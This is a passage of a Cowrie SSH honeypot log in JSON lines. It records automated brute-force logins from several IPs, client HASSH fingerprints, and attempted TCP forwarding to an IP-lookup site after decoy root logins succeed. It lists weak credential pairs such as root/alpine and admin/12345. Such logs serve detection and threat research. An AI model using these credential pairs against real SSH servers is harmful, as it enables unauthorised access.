{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:07:11.492375Z","src_ip":"212.227.235.229","session":"74418dd230e7"}
{"eventid":"cowrie.login.success","username":"root","password":"alpine","message":"login attempt [root/alpine] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:07:12.115556Z","src_ip":"212.227.235.229","session":"93728aedb24c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-26T04:07:12.368317Z","session":"93728aedb24c"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":41570,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c456c4bc27c","protocol":"ssh","message":"New connection: 68.183.87.241:41570 (1.2.3.4:22) [session: 5c456c4bc27c]","sensor":"my-vps","timestamp":"2025-08-26T04:07:12.671884Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:07:12.673430Z","src_ip":"68.183.87.241","session":"5c456c4bc27c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:07:12.961639Z","src_ip":"68.183.87.241","session":"5c456c4bc27c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T04:07:12.964139Z","src_ip":"212.227.235.229","session":"93728aedb24c"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:07:13.632726Z","src_ip":"212.227.235.229","session":"93728aedb24c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54826,"dst_ip":"1.2.3.4","dst_port":22,"session":"63997f48e169","protocol":"ssh","message":"New connection: 212.227.235.229:54826 (1.2.3.4:22) [session: 63997f48e169]","sensor":"my-vps","timestamp":"2025-08-26T04:07:13.998258Z"}
{"eventid":"cowrie.login.failed","username":"tpuser","password":"123","message":"login attempt [tpuser/123] failed","sensor":"my-vps","timestamp":"2025-08-26T04:07:14.146554Z","src_ip":"68.183.87.241","session":"5c456c4bc27c"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:07:14.992943Z","src_ip":"212.227.235.229","session":"63997f48e169"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:07:15.328026Z","src_ip":"212.227.235.229","session":"63997f48e169"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:07:15.432220Z","src_ip":"68.183.87.241","session":"5c456c4bc27c"}
{"eventid":"cowrie.login.failed","username":"sync","password":"click1","message":"login attempt [sync/click1] failed","sensor":"my-vps","timestamp":"2025-08-26T04:07:17.037327Z","src_ip":"212.227.235.229","session":"63997f48e169"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:07:18.812401Z","src_ip":"212.227.235.229","session":"63997f48e169"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33598,"dst_ip":"1.2.3.4","dst_port":22,"session":"d41e30c15c06","protocol":"ssh","message":"New connection: 212.227.235.229:33598 (1.2.3.4:22) [session: d41e30c15c06]","sensor":"my-vps","timestamp":"2025-08-26T04:07:21.459280Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:07:21.468538Z","src_ip":"212.227.235.229","session":"d41e30c15c06"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:07:21.709018Z","src_ip":"212.227.235.229","session":"d41e30c15c06"}
{"eventid":"cowrie.login.success","username":"root","password":"temp","message":"login attempt [root/temp] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:07:23.545191Z","src_ip":"212.227.235.229","session":"d41e30c15c06"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-26T04:07:23.798396Z","session":"d41e30c15c06"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T04:07:24.101807Z","src_ip":"212.227.235.229","session":"d41e30c15c06"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:07:24.376196Z","src_ip":"212.227.235.229","session":"d41e30c15c06"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57960,"dst_ip":"1.2.3.4","dst_port":22,"session":"17760970037d","protocol":"ssh","message":"New connection: 212.227.235.229:57960 (1.2.3.4:22) [session: 17760970037d]","sensor":"my-vps","timestamp":"2025-08-26T04:07:32.385112Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:07:32.385980Z","src_ip":"212.227.235.229","session":"17760970037d"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:07:32.646881Z","src_ip":"212.227.235.229","session":"17760970037d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40148,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f6e27a4ee51","protocol":"ssh","message":"New connection: 212.227.235.229:40148 (1.2.3.4:22) [session: 5f6e27a4ee51]","sensor":"my-vps","timestamp":"2025-08-26T04:07:33.041099Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:07:33.102480Z","src_ip":"212.227.235.229","session":"5f6e27a4ee51"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:07:33.319549Z","src_ip":"212.227.235.229","session":"5f6e27a4ee51"}
{"eventid":"cowrie.login.failed","username":"admin","password":"12345","message":"login attempt [admin/12345] failed","sensor":"my-vps","timestamp":"2025-08-26T04:07:33.897711Z","src_ip":"212.227.235.229","session":"17760970037d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38380,"dst_ip":"1.2.3.4","dst_port":22,"session":"5bd56beec969","protocol":"ssh","message":"New connection: 212.227.235.229:38380 (1.2.3.4:22) [session: 5bd56beec969]","sensor":"my-vps","timestamp":"2025-08-26T04:07:34.429674Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:07:34.430564Z","src_ip":"212.227.235.229","session":"5bd56beec969"}
{"eventid":"cowrie.login.success","username":"root","password":"abcd1234","message":"login attempt [root/abcd1234] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:07:34.965131Z","src_ip":"212.227.235.229","session":"5f6e27a4ee51"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-26T04:07:35.280966Z","session":"5f6e27a4ee51"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T04:07:35.544583Z","src_ip":"212.227.235.229","session":"5f6e27a4ee51"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:07:35.648656Z","src_ip":"212.227.235.229","session":"5bd56beec969"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:07:35.947233Z","src_ip":"212.227.235.229","session":"17760970037d"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:07:36.386049Z","src_ip":"212.227.235.229","session":"5f6e27a4ee51"}
{"eventid":"cowrie.login.failed","username":"git","password":"1234","message":"login attempt [git/1234] failed","sensor":"my-vps","timestamp":"2025-08-26T04:07:36.391356Z","src_ip":"212.227.235.229","session":"5bd56beec969"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:07:37.640975Z","src_ip":"212.227.235.229","session":"5bd56beec969"}
{"eventid":"cowrie.session.connect","src_ip":"93.123.109.181","src_port":44552,"dst_ip":"1.2.3.4","dst_port":22,"session":"d6a4b79b2d19","protocol":"ssh","message":"New connection: 93.123.109.181:44552 (1.2.3.4:22) [session: d6a4b79b2d19]","sensor":"my-vps","timestamp":"2025-08-26T04:07:40.145069Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T04:07:40.146221Z","src_ip":"93.123.109.181","session":"d6a4b79b2d19"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac